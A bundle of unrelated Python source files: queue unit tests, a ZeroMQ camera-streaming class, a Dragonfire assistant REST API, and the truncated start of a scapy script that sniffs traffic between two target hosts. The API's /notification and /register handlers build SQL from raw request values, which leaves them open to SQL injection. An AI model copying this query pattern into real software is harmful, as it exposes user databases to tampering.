for _ in range(batch_size):
while True:
if self.q.qsize() == 0:
time.sleep(1)
continue
img, assignment = self.q.get()
x_batch.append(img)
t_batch.append(assignment)
break
return np.asarray(x_batch), np.asarray(t_batch)
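# Usage sketch (directories, class count, input size and prior shapes below are
# illustrative assumptions; they depend on the detector this loader feeds):
#   data = Data('data/images', 'data/labels', num_classes=21, input_size=300,
#               shapes=[(38, 38), (19, 19), (10, 10), (5, 5), (3, 3), (1, 1)],
#               assignment_threshold=0.5)
#   data.start()                     # spawns the background producer process
#   x_batch, t_batch = data.get(16)  # blocks until 16 samples are available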
|
test_queue.py
|
# coding=utf-8
import os
import pickle
import random
import shutil
import sys
import tempfile
import unittest
from collections import namedtuple
from nose2.tools import params
from threading import Thread
import persistqueue.serializers.json
import persistqueue.serializers.msgpack
import persistqueue.serializers.pickle
from persistqueue import Queue, Empty, Full
# map keys as params for readable errors from nose
serializer_params = {
"serializer=default": {},
"serializer=json": {"serializer": persistqueue.serializers.json},
"serializer=msgpack": {"serializer": persistqueue.serializers.msgpack},
"serializer=pickle": {"serializer": persistqueue.serializers.pickle},
}
class PersistTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='queue')
def tearDown(self):
shutil.rmtree(self.path, ignore_errors=True)
@params(*serializer_params)
def test_open_close_single(self, serializer):
"""Write 1 item, close, reopen checking if same item is there"""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
del q
q = Queue(self.path, **serializer_params[serializer])
self.assertEqual(1, q.qsize())
self.assertEqual('var1', q.get())
q.task_done()
@params(*serializer_params)
def test_open_close_1000(self, serializer):
"""Write 1000 items, close, reopen checking if all items are there"""
q = Queue(self.path, **serializer_params[serializer])
for i in range(1000):
q.put('var%d' % i)
self.assertEqual(1000, q.qsize())
del q
q = Queue(self.path, **serializer_params[serializer])
self.assertEqual(1000, q.qsize())
for i in range(1000):
data = q.get()
self.assertEqual('var%d' % i, data)
q.task_done()
with self.assertRaises(Empty):
q.get_nowait()
# assert adding another one still works
q.put('foobar')
data = q.get()
@params(*serializer_params)
def test_partial_write(self, serializer):
"""Test recovery from previous crash w/ partial write"""
q = Queue(self.path, **serializer_params[serializer])
for i in range(100):
q.put('var%d' % i)
del q
with open(os.path.join(self.path, 'q00000'), 'ab') as f:
pickle.dump('文字化け', f)
q = Queue(self.path, **serializer_params[serializer])
self.assertEqual(100, q.qsize())
for i in range(100):
self.assertEqual('var%d' % i, q.get())
q.task_done()
with self.assertRaises(Empty):
q.get_nowait()
@params(*serializer_params)
def test_random_read_write(self, serializer):
"""Test random read/write"""
q = Queue(self.path, **serializer_params[serializer])
n = 0
for i in range(1000):
if random.random() < 0.5:
if n > 0:
q.get_nowait()
q.task_done()
n -= 1
else:
with self.assertRaises(Empty):
q.get_nowait()
else:
q.put('var%d' % random.getrandbits(16))
n += 1
@params(*serializer_params)
def test_multi_threaded(self, serializer):
"""Create consumer and producer threads, check parallelism"""
q = Queue(self.path, **serializer_params[serializer])
def producer():
for i in range(1000):
q.put('var%d' % i)
def consumer():
for i in range(1000):
q.get()
q.task_done()
c = Thread(target=consumer)
c.start()
p = Thread(target=producer)
p.start()
c.join()
p.join()
q.join()
with self.assertRaises(Empty):
q.get_nowait()
@params(*serializer_params)
def test_garbage_on_head(self, serializer):
"""Adds garbage to the queue head and let the internal integrity
checks fix it"""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
del q
with open(os.path.join(self.path, 'q00000'), 'ab') as f:
f.write(b'garbage')
q = Queue(self.path, **serializer_params[serializer])
q.put('var2')
self.assertEqual(2, q.qsize())
self.assertEqual('var1', q.get())
q.task_done()
@params(*serializer_params)
def test_task_done_too_many_times(self, serializer):
"""Test too many task_done called."""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
q.get()
q.task_done()
with self.assertRaises(ValueError):
q.task_done()
@params(*serializer_params)
def test_get_timeout_negative(self, serializer):
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
with self.assertRaises(ValueError):
q.get(timeout=-1)
@params(*serializer_params)
def test_get_timeout(self, serializer):
"""Test when get failed within timeout."""
q = Queue(self.path, **serializer_params[serializer])
q.put('var1')
q.get()
with self.assertRaises(Empty):
q.get(timeout=1)
@params(*serializer_params)
def test_put_nowait(self, serializer):
"""Tests the put_nowait interface."""
q = Queue(self.path, **serializer_params[serializer])
q.put_nowait('var1')
self.assertEqual('var1', q.get())
q.task_done()
@params(*serializer_params)
def test_put_maxsize_reached(self, serializer):
"""Test that maxsize reached."""
q = Queue(self.path, maxsize=10, **serializer_params[serializer])
for x in range(10):
q.put(x)
with self.assertRaises(Full):
q.put('full_now', block=False)
@params(*serializer_params)
def test_put_timeout_reached(self, serializer):
"""Test put with block and timeout."""
q = Queue(self.path, maxsize=2, **serializer_params[serializer])
for x in range(2):
q.put(x)
with self.assertRaises(Full):
q.put('full_and_timeout', block=True, timeout=1)
@params(*serializer_params)
def test_put_timeout_negative(self, serializer):
"""Test and put with timeout < 0"""
q = Queue(self.path, maxsize=1, **serializer_params[serializer])
with self.assertRaises(ValueError):
q.put('var1', timeout=-1)
@params(*serializer_params)
def test_put_block_and_wait(self, serializer):
"""Test block until queue is not full."""
q = Queue(self.path, maxsize=10, **serializer_params[serializer])
def consumer():
for i in range(5):
q.get()
q.task_done()
def producer():
for j in range(16):
q.put('var%d' % j)
p = Thread(target=producer)
p.start()
c = Thread(target=consumer)
c.start()
c.join()
val = q.get_nowait()
p.join()
self.assertEqual('var5', val)
@params(*serializer_params)
def test_clear_tail_file(self, serializer):
"""Test that only remove tail file when calling task_done."""
q = Queue(self.path, chunksize=10, **serializer_params[serializer])
for i in range(35):
q.put('var%d' % i)
for _ in range(15):
q.get()
q = Queue(self.path, chunksize=10, **serializer_params[serializer])
self.assertEqual(q.qsize(), 35)
for _ in range(15):
q.get()
# the first tail file gets removed after task_done
q.task_done()
for _ in range(16):
q.get()
# the second and third files get removed after task_done
q.task_done()
self.assertEqual(q.qsize(), 4)
def test_protocol(self):
# test that protocol is set properly
expect_protocol = 2 if sys.version_info[0] == 2 else 4
self.assertEqual(
persistqueue.serializers.pickle.protocol,
expect_protocol,
)
# test that protocol is used properly
serializer = namedtuple("Serializer", ["dump", "load"])(
persistqueue.serializers.pickle.dump, lambda fp: fp.read())
q = Queue(path=self.path, serializer=serializer)
q.put(b'a')
self.assertEqual(q.get(), pickle.dumps(b'a', protocol=expect_protocol))
|
NetCam.py
|
################################################################################
## NetCam class
## Manages a camera stream over a network
## Author : J. Coupez
## Date : 10/10/2020
## Version : 0.1
################################################################################
import time
from threading import Thread
import zmq
import cv2
import base64
import numpy as np
import socket
# import pyguetzli
class NetCam:
DEFAULT_CLIENT_PORT = '5556'
DEFAULT_WINDOW_NAME = 'Stream'
WINDOW_COUNTER = 0
DEFAULT_RES = 'HD'
MAX_FPS = 60
NBR_BUFFER = 5
TEXT_COLOR = (0, 0, 255)
TEXT_POSITION = (0, 0)
def __init__(self,
capture='VGA',
display=None,
isStereoCam=False,
source='0',
ip=None,
port=None,
consolelog=True):
self.consoleLog = consolelog
self.captureResolution = capture
self.displayResolution = display
self.isStereoCam = isStereoCam
self.source = source
self.imgWidth, self.imgHeight = resolutionFinder(self.captureResolution, self.isStereoCam)
self.displayWidth, self.displayHeight = resolutionFinder(self.displayResolution)
self.fps = NetCam.MAX_FPS
self.imgBuffer = [None] * NetCam.NBR_BUFFER
self.imgBufferReady = 0
self.imgBufferWriting = 0
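        # imgBuffer acts as a small ring buffer: writers fill the slot indexed by
        # imgBufferWriting while readers always take imgBufferReady, so a frame is
        # never read from the slot currently being written (see the capture and
        # network threads below).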
self.flipVertical = False
self.isCaptureRunning = False
self.isDisplayRunning = False
self.isNetworkRunning = False
self.fullScreen = False
self.videoStream = None
## Debug informations
self.displayDebug = False
self.showStereo = False
self.displayFps = FpsCatcher()
self.captureFps = FpsCatcher()
self.networkFps = FpsCatcher()
# Network information
self.hostname = socket.gethostname()
self.ip_address = ip
self.ip_port = port or NetCam.DEFAULT_CLIENT_PORT
self.windowName = ip or self.hostname or NetCam.DEFAULT_WINDOW_NAME
NetCam.WINDOW_COUNTER += 1
if NetCam.WINDOW_COUNTER > 1:
self.windowName += f' ({NetCam.WINDOW_COUNTER})'
self.threadList = []
self.console('Starting NetCam...')
if self.ip_address is None:
# Start the capture
self.startCapture()
else:
# Start to receive the stream
self.startReceive()
time.sleep(0.1)
## Init the display when requested (on main thread)
if self.displayResolution:
self.initDisplay()
time.sleep(0.1)
def startCapture(self):
"""
Start capturing video frame and put them in the imgBuffer
"""
## Close any previously opened stream
if self.isCaptureRunning and self.videoStream:
self.videoStream.release()
self.isCaptureRunning = False
## Launch the camera capture thread
self.console('Init camera capture...', 1)
## prepare the triple buffering
self.videoStream = self.initVideoStream(self.source)
## Get the real width, height and fps supported by the camera
self.imgWidth = int(self.videoStream.get(cv2.CAP_PROP_FRAME_WIDTH))
self.imgHeight = int(self.videoStream.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps = self.videoStream.get(cv2.CAP_PROP_FPS)
self.computeDisplayHeight()
self.console(f'Capture resolution : {self.imgWidth} x {self.imgHeight} @ {self.fps}', 1)
# Initialise each buffer
for i in range(NetCam.NBR_BUFFER):
self.imgBuffer[i] = np.empty(shape=(self.imgHeight, self.imgWidth, 3), dtype=np.uint8)
## Guarantee the first frame
self.videoStream.read(self.imgBuffer[self.imgBufferWriting])
self.imgBufferWriting += 1
## Launch the capture thread
videoThread = Thread(target=self.captureThreadRunner, args=([self.videoStream]), daemon=True)
videoThread.start()
def startBroadcast(self):
"""
Launch the network client ( broadcast the camera signal)
"""
## Launch the networdThread
self.ip_address = get_ip()
self.console(f'Launch broadcast...')
zmqContext = zmq.Context()
# zmqContext = SerializingContext()
socket = zmqContext.socket(zmq.PUB)
workerThread = Thread(target=self.clientThreadRunner, args=([socket]))
self.threadList.append(workerThread)
workerThread.start()
time.sleep(0.1)
self.console(f'Now broadcasting. URI of Camera : {self.ip_address}:{self.ip_port} !')
def startReceive(self):
"""
Launch the network client ( broadcast the camera signal)
"""
## Launch the networdThread
self.console(f'Connecting to camera on {self.ip_address}:{self.ip_port}...', 1)
zmqContext = zmq.Context()
# zmqContext = SerializingContext()
socket = zmqContext.socket(zmq.SUB)
workerThread = Thread(target=self.serverThreadRunner, args=([socket]))
self.threadList.append(workerThread)
workerThread.start()
time.sleep(0.1)
def initVideoStream(self, source):
"""
Initialize the video stream with the right resolution and settings
:param source: the name of the camera device to use for capture. use video0 if not provided
"""
videoStream = cv2.VideoCapture(0 if source == '0' else source, cv2.CAP_V4L2)
isOpened = videoStream.isOpened()
if not isOpened:
# Try to open the camera without the Video for linux driver
videoStream = cv2.VideoCapture(0 if source == '0' else source)
isOpened = videoStream.isOpened()
        assert isOpened, 'Unable to open camera %s. Is your camera connected (look for videoX in /dev/)?' % source
## Get the requested resolution
width, height = resolutionFinder(self.captureResolution, self.isStereoCam)
## Define all video settings
        videoStream.set(cv2.CAP_PROP_BUFFERSIZE,
                        NetCam.NBR_BUFFER)  # enlarge the camera buffer to NBR_BUFFER frames
videoStream.set(cv2.CAP_PROP_FPS, NetCam.MAX_FPS) # try to put the fps to MAX_FPS
videoStream.set(cv2.CAP_PROP_FOURCC,
cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')) # define the compression to mjpg
videoStream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
videoStream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
return videoStream
def captureThreadRunner(self, stream):
"""
Read next stream frame in a daemon thread
:param stream: videoStream to read from
"""
self.isCaptureRunning = True
self.console('Capture thread is now running.', 1)
while self.isCaptureRunning:
# For buffering : Never read where we write
self.imgBufferReady = self.imgBufferWriting
self.imgBufferWriting = 0 if self.imgBufferWriting == NetCam.NBR_BUFFER - 1 else self.imgBufferWriting + 1
stream.read(self.imgBuffer[self.imgBufferWriting])
if self.displayDebug:
self.captureFps.compute()
time.sleep(0.001)
if self.videoStream and self.videoStream.isOpened():
self.videoStream.release()
self.console('Released camera.', 1)
self.videoStream = None
self.console('Capture thread stopped.', 1)
def clientThreadRunner(self, socket):
"""
Publish Data to any connected Server
:param socket:
"""
url_publish = "tcp://*:%s" % self.ip_port
socket.setsockopt(zmq.CONFLATE, 1)
socket.set_hwm(2)
socket.bind(url_publish)
self.isNetworkRunning = True
self.console(f'Network thread is now running ( {url_publish} )...', 1)
# i = 0
# topic = 1234
initTime = FpsCatcher.currentMilliTime()
bufferSize = 0
bufferSizeSec = 0
frameCount = 0
while self.isNetworkRunning:
if self.displayDebug:
self.networkFps.compute()
currentTime = FpsCatcher.currentMilliTime()
# encoded, buffer = cv2.imencode('.jpg', np.empty(shape=(5, 5, 3), dtype=np.uint8))
encoded, buffer = cv2.imencode('.jpg', self.imgBuffer[self.imgBufferReady])
# result = cv2.imwrite("test.jpg",self.imgBuffer[self.imgBufferReady])
# self.console(result)
# input_jpeg_bytes = open("test.jpg", "rb").read()
# imgBuffer = self.imgBuffer[self.imgBufferReady]
# imgBuffer = imgBuffer.ravel()
# optiTime = FpsCatcher.currentMilliTime()
# optibuffer = pyguetzli.process_jpeg_bytes(input_jpeg_bytes)
# self.imgBuffer[self.imgBufferReady] = buffer
# self.console(f'comrpession time: {FpsCatcher.currentMilliTime() - optiTime} milli')
bufferSize = int(len(buffer)/1024)
bufferSizeSec += bufferSize
frameCount += 1
            self.console(f'frame size : {bufferSize * 8} kbit ({bufferSize} KB)')
            if currentTime - initTime > 1000:
                self.console(f'frames sent per sec: {frameCount}', 1)
                self.console(f'data sent per sec : {bufferSizeSec * 8} kbit ({bufferSizeSec} KB)', 1)
bufferSizeSec = 0
frameCount = 0
initTime = currentTime
socket.send(buffer, copy=False)
processTime = FpsCatcher.currentMilliTime() - currentTime
waitTime = 1
if processTime > 0 and processTime < 33:
waitTime = 33 - processTime
# self.console(f'processTime : {processTime} milli - waitTime: {waitTime} milli')
waitTime = waitTime / 1000.0
time.sleep(waitTime)
self.console('Network thread stopped.')
def serverThreadRunner(self, socket):
url_publisher = f"tcp://{self.ip_address}:{self.ip_port}"
# topicfilter = "1234"
        socket.setsockopt_string(zmq.SUBSCRIBE, '')  # subscribe to every topic (np.unicode was removed from NumPy)
socket.set_hwm(2)
socket.setsockopt(zmq.CONFLATE, 1)
socket.connect(url_publisher)
self.isNetworkRunning = True
# socket.setsockopt(zmq.SUBSCRIBE, topicfilter)
self.console(f'Connected To {url_publisher}')
timeoutMsg = 0
initTime = FpsCatcher.currentMilliTime()
bufferSize = 0
frameCount = 0
while self.isNetworkRunning:
try:
currentTime = FpsCatcher.currentMilliTime()
buffer = socket.recv(flags=zmq.NOBLOCK, copy=False)
bufferSize += len(buffer) / 1024
frameCount += 1
if currentTime - initTime > 1000:
                    self.console(f'frames received per sec: {frameCount}')
                    self.console(f'data received per sec : {bufferSize} KB')
bufferSize = 0
frameCount = 0
initTime = currentTime
shape = [len(buffer.bytes), 1]
buffer = np.frombuffer(buffer, dtype='uint8')
buffer = buffer.reshape(shape)
# For buffering : Never read where we write
self.imgBufferReady = self.imgBufferWriting
self.imgBufferWriting = 0 if self.imgBufferWriting == NetCam.NBR_BUFFER - 1 else self.imgBufferWriting + 1
self.imgBuffer[self.imgBufferWriting] = cv2.imdecode(buffer, 1)
if self.displayDebug:
self.networkFps.compute()
if timeoutMsg >= 1000: # 1 sec elapsed
self.console(f'Re-Connected To {url_publisher}')
timeoutMsg = 0
except Exception as err:
timeoutMsg += 1
if timeoutMsg >= 3000: # 3 sec before writing timeout message
self.console(f'Waiting image from {url_publisher} ...')
timeoutMsg = 0
time.sleep(0.001)
self.isNetworkRunning = False
self.console('Network thread stopped.')
def getDetail(self):
return ({
'captureResolution': self.captureResolution,
'displayResolution': self.displayResolution,
'isStereo': self.isStereoCam,
'width': self.imgWidth,
'height': self.imgHeight,
'maxFps': self.fps,
'isCaptureRunning': self.isCaptureRunning,
})
def initDisplay(self):
self.console('Init display...', 1)
self.console(f'Display resolution : {self.displayResolution} ({self.displayWidth} x {self.displayHeight})', 2)
cv2.namedWindow(self.windowName, cv2.WINDOW_GUI_NORMAL)
self.toggleFullScreen(self.fullScreen)
self.isDisplayRunning = True
time.sleep(0.1)
self.console('Display is now ready.', 2)
def display(self):
if not self.displayResolution:
# No Display was setup
# self.console('You need to setup the display Resolution in NetCam constructor. ex : NetCam(display=\'VGA\'')
# time(1)
return
if not self.isDisplayRunning:
cv2.destroyAllWindows()
return
# Try to see if the window has been closed by clicking on the right upper cross
try:
isWindowClosed = cv2.getWindowProperty(self.windowName, 0)
if isWindowClosed == -1:
# the window has been closed
self.console("Window was closed.")
self.clearAll()
except:
self.console("Window was closed.")
self.clearAll()
return
frame = self.imgBuffer[self.imgBufferReady]
if frame is None:
return # Nothing to display
if self.isStereoCam and not self.showStereo:
# the Display is not in stereo, so remove the half of the picture
height, width, _ = frame.shape
frame = frame[0:height, 0:width // 2]
if self.displayHeight != self.imgHeight:
# Resize the picture for display purpose
width = self.displayWidth if not self.showStereo else self.displayWidth * 2
frame = cv2.resize(frame, (width, self.displayHeight))
else:
frame = np.copy(frame)
if self.flipVertical:
frame = cv2.flip(frame, 0)
if self.displayDebug:
self.displayFps.compute()
debugTextSize = self.displayWidth / 1280
thickness = 1 if self.displayWidth < 1280 else 2
textPosX, textPosY = NetCam.TEXT_POSITION
textPosX += int(40 * debugTextSize)
textPosY += int(40 * debugTextSize)
frame = cv2.putText(frame, f'Capture : {self.captureFps.fps} fps ({self.captureResolution}) | '
f'Display : {self.displayFps.fps} fps ({self.displayResolution}) | '
f'Network : {self.networkFps.fps} fps',
(textPosX, textPosY),
cv2.FONT_HERSHEY_SIMPLEX, debugTextSize, NetCam.TEXT_COLOR, thickness,
cv2.LINE_AA)
textPosY += int(40 * debugTextSize)
frame = cv2.putText(frame, f'f : fullscreen | s : see stereo | F1 to F5 : change display',
(textPosX, textPosY), cv2.FONT_HERSHEY_SIMPLEX, debugTextSize, NetCam.TEXT_COLOR,
thickness,
cv2.LINE_AA)
cv2.imshow(self.windowName, frame)
self.listenKeyboard()
def setDisplayResolution(self, resolution):
        if resolution is not None:
self.displayResolution = resolution
self.displayWidth, self.displayHeight = resolutionFinder(resolution)
self.computeDisplayHeight()
cv2.resizeWindow(self.windowName, self.displayWidth, self.displayHeight)
self.console(f'Changed Display resolution for : {resolution} ({self.displayWidth} x {self.displayHeight})')
def toggleFullScreen(self, isFullScreen=None):
self.fullScreen = isFullScreen if isFullScreen is not None else not self.fullScreen
if self.fullScreen:
self.console(f'Toggle fullscreen')
cv2.namedWindow(self.windowName, cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty(self.windowName, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# cv2.setWindowProperty(self.windowName, cv2.WND_PROP_TOPMOST, 1.0)
else:
cv2.namedWindow(self.windowName, cv2.WINDOW_AUTOSIZE)
cv2.setWindowProperty(self.windowName, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self.windowName, self.displayWidth, self.displayHeight)
# cv2.setWindowProperty(self.windowName, cv2.WND_PROP_TOPMOST, 0.0)
def toggleDisplayStereo(self, isShowStereo=None):
self.showStereo = isShowStereo if isShowStereo is not None else not self.showStereo
self.console(f'Show Stereo : {self.showStereo}')
def listenKeyboard(self):
key = cv2.waitKey(20)
if key != -1:
if key == ord('q'): # q to quit
self.clearAll()
elif key == 35 or key == 47: # Tilde to show debug
self.toggleDebug()
elif key == 190 or key == 122: # F1
self.setDisplayResolution('QVGA')
elif key == 191 or key == 120: # F2
self.setDisplayResolution('VGA')
elif key == 192 or key == 99: # F3
self.setDisplayResolution('HD')
elif key == 193 or key == 118: # F4
self.setDisplayResolution('FHD')
elif key == 194 or key == 96: # F5
self.setDisplayResolution('2K')
elif key == ord('f'): # F to toggle fullscreen
self.toggleFullScreen()
elif key == ord('s'): # S to toggle display stereo
self.toggleDisplayStereo()
elif key == 27: # Esc key was pressed,
self.toggleFullScreen(False)
else:
print(f'Key pressed: {key}')
def toggleDebug(self):
self.displayDebug = not self.displayDebug
self.console(f'Debugging is now {self.displayDebug}.')
self.displayFps.initTime()
self.captureFps.initTime()
self.networkFps.initTime()
def clearAll(self):
if self.isNetworkRunning:
self.console('Stopping Network...')
self.isNetworkRunning = False
time.sleep(0.1)
if self.isDisplayRunning:
self.console('Stopping Display...')
self.isDisplayRunning = False
time.sleep(0.1)
if self.isCaptureRunning:
self.console('Stopping Capture...')
self.isCaptureRunning = False
time.sleep(0.1)
self.threadList = []
zmqContext = zmq.Context.instance()
zmqContext.term()
time.sleep(0.5)
self.console('Stopping Done.')
def computeDisplayHeight(self):
widthMultiplier = 2 if self.isStereoCam else 1
if self.imgWidth and self.imgHeight and self.displayWidth:
self.displayHeight = int(self.displayWidth / (self.imgWidth // widthMultiplier) * self.imgHeight)
def invertVertical(self):
self.flipVertical = not self.flipVertical
def isRunning(self):
return self.isCaptureRunning or self.isDisplayRunning or self.isNetworkRunning
def console(self, text, indentlevel=0):
if self.consoleLog:
output = time.strftime('%b %d at %H:%M:%S') + ' : '
for count in range(0, indentlevel):
output = output + '\t'
print(f'{output}{text}')
def resolutionFinder(res, isstereocam=False):
    if res is None:
return (None, None)
widthMultiplier = 2 if isstereocam else 1
# switcher = {
# 'QVGA': 320 ,
# 'VGA': 640 ,
# 'HD': 1280 ,
# 'FHD': 1920 ,
# '2K': 2048
# }
switcher = {
'QVGA': (320 * widthMultiplier, 240),
'VGA': (640 * widthMultiplier, 480),
'HD': (1280 * widthMultiplier, 720),
'FHD': (1920 * widthMultiplier, 1080),
'2K': (2048 * widthMultiplier, 1080)
}
return switcher.get(res, (640 * widthMultiplier, 480))
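# e.g. resolutionFinder('HD') -> (1280, 720) and resolutionFinder('HD', True) -> (2560, 720);
# unrecognised labels fall back to VGA width for the requested multiplier.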
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
class FpsCatcher:
currentMilliTime = lambda: int(round(time.time() * 1000))
def __init__(self):
self.initTime()
def initTime(self):
self.currentTime = 0
self.currentFrame = 0
self.fps = 0
def compute(self):
now = FpsCatcher.currentMilliTime()
if now - self.currentTime >= 1000:
self.currentTime = now
self.fps = self.currentFrame
self.currentFrame = 0
self.currentFrame += 1
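# Usage sketch (assumption: one sender and one receiver machine; the IP below is
# a placeholder):
#   Sender:   cam = NetCam(capture='HD'); cam.startBroadcast()
#   Receiver: viewer = NetCam(display='HD', ip='192.168.1.10')
#             while viewer.isRunning(): viewer.display()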
|
api.py
|
from __future__ import print_function
import hug
from hug_middleware_cors import CORSMiddleware
import waitress
from threading import Thread
import json
from dragonfire.omniscient import Engine
from dragonfire.conversational import DeepConversation
from dragonfire.learn import Learner
from dragonfire.config import Config
from dragonfire.arithmetic import arithmetic_parse
import wikipedia as wikipedia_lib
import re
import youtube_dl
import pymysql
import random
nlp = None
omniscient = None
userin = None
dc = None
learner = None
precomptoken = None
@hug.authentication.token
def token_authentication(token):
if token == precomptoken:
return True
@hug.post('/tag', requires=token_authentication)
def tagger_end(text):
return json.dumps(tagger(text), indent=4)
def tagger(text):
data = []
doc = nlp(text)
for token in doc:
parse = {
'text': token.text,
'lemma': token.lemma_,
'pos': token.pos_,
'tag': token.tag_,
'dep': token.dep_,
'shape': token.shape_,
'is_alpha': token.is_alpha,
'is_stop': token.is_stop
}
data.append(parse)
return data
@hug.post('/dep', requires=token_authentication)
def dependency_parser_end(text):
return json.dumps(dependency_parser(text), indent=4)
def dependency_parser(text):
data = []
doc = nlp(text)
for chunk in doc.noun_chunks:
parse = {
'text': chunk.text,
'root_text': chunk.root.text,
'root_dep': chunk.root.dep_,
'root_head_text': chunk.root.head.text,
}
data.append(parse)
return data
@hug.post('/ner', requires=token_authentication)
def entity_recognizer_end(text):
return json.dumps(entity_recognizer(text), indent=4)
def entity_recognizer(text):
data = []
doc = nlp(text)
for ent in doc.ents:
parse = {
'text': ent.text,
'start_char': ent.start_char,
'end_char': ent.end_char,
'label': ent.label_,
}
data.append(parse)
return data
@hug.post('/token', requires=token_authentication)
def tokenizer_end(text):
return json.dumps(tokenizer(text), indent=4)
def tokenizer(text):
data = []
doc = nlp(text)
for token in doc:
data.append(token.text)
return data
@hug.post('/sent', requires=token_authentication)
def sentence_segmenter_end(text):
return json.dumps(sentence_segmenter(text), indent=4)
def sentence_segmenter(text):
data = []
doc = nlp(text)
for sent in doc.sents:
data.append(sent.text)
return data
@hug.post('/cmd', requires=token_authentication)
def cmd(text):
return json.dumps(all_in_one(text), indent=4)
def all_in_one(text):
data = []
sents = sentence_segmenter(text)
for sent in sents:
sent_data = {}
sent_data['tags'] = tagger(sent)
sent_data['deps'] = dependency_parser(sent)
sent_data['ners'] = entity_recognizer(sent)
data.append(sent_data)
return data
@hug.post('/omni', requires=token_authentication)
def omni(text, gender_prefix):
answer = omniscient.respond(text, userin=userin, user_prefix=gender_prefix, is_server=True)
if not answer:
answer = ""
return json.dumps(answer, indent=4)
@hug.post('/deep', requires=token_authentication)
def deep(text, gender_prefix):
answer = dc.respond(text, user_prefix=gender_prefix)
return json.dumps(answer, indent=4)
@hug.post('/wikipedia', requires=token_authentication)
def wikipedia(query, gender_prefix):
response = ""
url = ""
wikiresult = wikipedia_lib.search(query)
if len(wikiresult) == 0:
response = "Sorry, " + gender_prefix + ". But I couldn't find anything about " + query + " in Wikipedia."
else:
wikipage = wikipedia_lib.page(wikiresult[0])
wikicontent = "".join([
i if ord(i) < 128 else ' '
for i in wikipage.content
])
wikicontent = re.sub(r'\([^)]*\)', '', wikicontent)
response = " ".join(sentence_segmenter(wikicontent)[:3])
url = wikipage.url
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/youtube', requires=token_authentication)
def youtube(query, gender_prefix):
response = ""
url = ""
info = youtube_dl.YoutubeDL({}).extract_info('ytsearch:' + query, download=False, ie_key='YoutubeSearch')
if len(info['entries']) > 0:
response = info['entries'][0]['title']
url = "https://www.youtube.com/watch?v=%s" % (info['entries'][0]['id'])
response = "".join([
i if ord(i) < 128 else ' '
for i in response
])
else:
response = "No video found, " + gender_prefix + "."
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/learn', requires=token_authentication)
def learn(text, user_id):
response = learner.respond(text, is_server=True, user_id=user_id)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/math', requires=token_authentication)
def math(text):
response = arithmetic_parse(text)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/notification', requires=token_authentication)
def notification(user_id, location, gender_prefix):
url = ""
title = ""
message = ""
db = pymysql.connect(Config.MYSQL_HOST, Config.MYSQL_USER, Config.MYSQL_PASS, Config.MYSQL_DB)
cursor = db.cursor(pymysql.cursors.DictCursor)
sql1 = "SELECT * FROM users WHERE id = {}".format(user_id)
sql2 = "SELECT * FROM notifications"
try:
cursor.execute(sql1)
results = cursor.fetchall()
if results:
row = results[0]
name = row["name"]
gender = row["gender"]
birth_date = row["birth_date"]
else:
name = "Master"
gender = 1
birth_date = "1980-01-01"
cursor.execute(sql2)
results = cursor.fetchall()
row = random.choice(results)
if row["capitalize"] == 1:
gender_prefix = gender_prefix.capitalize()
url = row["url"]
title = row["title"]
message = row["message"].format(gender_prefix, name)
    except pymysql.InternalError as error:
        # Use distinct names so the notification 'message' built above is not clobbered.
        err_code, err_message = error.args
        print(">>>>>>>>>>>>>", err_code, err_message)
db.close()
data = {}
data['url'] = url
data['title'] = title
data['message'] = message
return json.dumps(data, indent=4)
@hug.post('/register', requires=token_authentication)
def register(name, gender, birth_date):
id = ""
db = pymysql.connect(Config.MYSQL_HOST, Config.MYSQL_USER, Config.MYSQL_PASS, Config.MYSQL_DB)
cursor = db.cursor(pymysql.cursors.DictCursor)
sql = """
INSERT INTO users (name, gender, birth_date)
VALUES('{}', '{}', '{}')
""".format(name, gender, birth_date)
try:
cursor.execute(sql)
db.commit()
id = cursor.lastrowid
except pymysql.InternalError as error:
code, message = error.args
print (">>>>>>>>>>>>>", code, message)
db.close()
return json.dumps(id, indent=4)
class Run():
def __init__(self, nlpRef, userinRef, token):
global nlp
global omniscient
global userin
global dc
global precomptoken
global learner
nlp = nlpRef # Load en_core_web_sm, English, 50 MB, default model
omniscient = Engine(nlp)
dc = DeepConversation()
learner = Learner(nlp)
userin = userinRef
precomptoken = token
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
t = Thread(target=waitress.serve, args=(__hug_wsgi__, ), kwargs={"port": 3301})
t.start()
t.join()
if __name__ == '__main__':
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
waitress.serve(__hug_wsgi__, port=8000)
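# Usage sketch (assumption: hug's token authentication reads the Authorization
# header; host, port and token values are placeholders):
#   curl -X POST -H "Authorization: <token>" --data "text=Hello world." \
#        http://localhost:3301/tag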
|
Main.py
|
__author__ = '01'
__author__ += "Binary"
__author__ += "ZeroOne"
__author__ += "Hooman"
from scapy.layers.inet import *
from scapy.all import *
import threading
import time
import sys
import os
conf.route.resync()
conf.verb = 0
def PacketAnalyze(Pck) :
if((Pck.haslayer(IP)) and ((Pck.getlayer(IP).src == Target1_IP and Pck.getlayer(IP).dst == Target2_IP) or (Pck.getlayer(IP).src == Target2_IP and Pck.getlayer(IP).dst == Target1_IP))) :
if((Pck.getlayer(IP).src == Target1_IP)) :
